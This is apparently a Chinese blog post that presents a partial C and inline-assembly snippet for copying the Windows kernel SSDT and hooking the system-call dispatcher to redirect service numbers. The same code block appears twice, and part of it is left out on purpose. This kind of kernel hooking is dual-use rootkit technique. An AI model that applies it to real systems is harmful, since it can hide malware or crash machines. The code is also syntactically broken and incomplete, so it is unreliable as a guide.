本文探讨了通过修改内核服务表(SSDT)实现驱动程序的安全加载机制。该方法涉及内存分配、服务表复制及挂钩操作,确保系统服务的安全调用。
//By killvxk
void KAVSafe()
{
LimitNumber = KeServiceDescriptorTable->ntoskrnl.ServiceLimit;
mySST = (PULONG)ExAllocatePoolWithTag(NonPagedPool,LimitNumber * 4+20,'vxk');
mySSTParamTable = (PUCHAR)ExAllocatePoolWithTag(NonPagedPool,LimitNumber+20,'vxk');
memcpy(mySST,KeServiceDescriptorTable->ntoskrnl.ServiceTable,LimitNumber *4);
memcpy(mySSTParamTable,KeServiceDescriptorTable->ntoskrnl.ArgumentTable,LimitNumber);
if (!KeAddSystemServiceTable(mySST,NULL,LimitNumber,mySSTParamTable,3))
{
goto f**kother
}
else
{
oldret = HookCode(hkKiXXXX);
}
return;
f**kother:
//有些系统上SSDT没有4个位置或者第四个被占用,此时我们复制第一个表,然后把自己加载后面
//代码因为xxxx原因,暂略~
}
__declspec (naked)
void hkKiXXXX
{
__asm
{
pushad
pushfd
push fs
push es
push ds
push eax
mov ax,0x30
mov fs,ax
pop eax
cmp eax,0x1000
jb fixit;
nofix:
pop ds
pop es
pop fs
popfd
popad
jmp oldret
fixit:
pop ds
pop es
pop fs
popfd
popad
add eax,0x3000
jmp oldret
}
}
void KAVSafe()
{
LimitNumber = KeServiceDescriptorTable->ntoskrnl.ServiceLimit;
mySST = (PULONG)ExAllocatePoolWithTag(NonPagedPool,LimitNumber * 4+20,'vxk');
mySSTParamTable = (PUCHAR)ExAllocatePoolWithTag(NonPagedPool,LimitNumber+20,'vxk');
memcpy(mySST,KeServiceDescriptorTable->ntoskrnl.ServiceTable,LimitNumber *4);
memcpy(mySSTParamTable,KeServiceDescriptorTable->ntoskrnl.ArgumentTable,LimitNumber);
if (!KeAddSystemServiceTable(mySST,NULL,LimitNumber,mySSTParamTable,3))
{
goto f**kother
}
else
{
oldret = HookCode(hkKiXXXX);
}
return;
f**kother:
//有些系统上SSDT没有4个位置或者第四个被占用,此时我们复制第一个表,然后把自己加载后面
//代码因为xxxx原因,暂略~
}
__declspec (naked)
void hkKiXXXX
{
__asm
{
pushad
pushfd
push fs
push es
push ds
push eax
mov ax,0x30
mov fs,ax
pop eax
cmp eax,0x1000
jb fixit;
nofix:
pop ds
pop es
pop fs
popfd
popad
jmp oldret
fixit:
pop ds
pop es
pop fs
popfd
popad
add eax,0x3000
jmp oldret
}
}
扫一扫
291
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
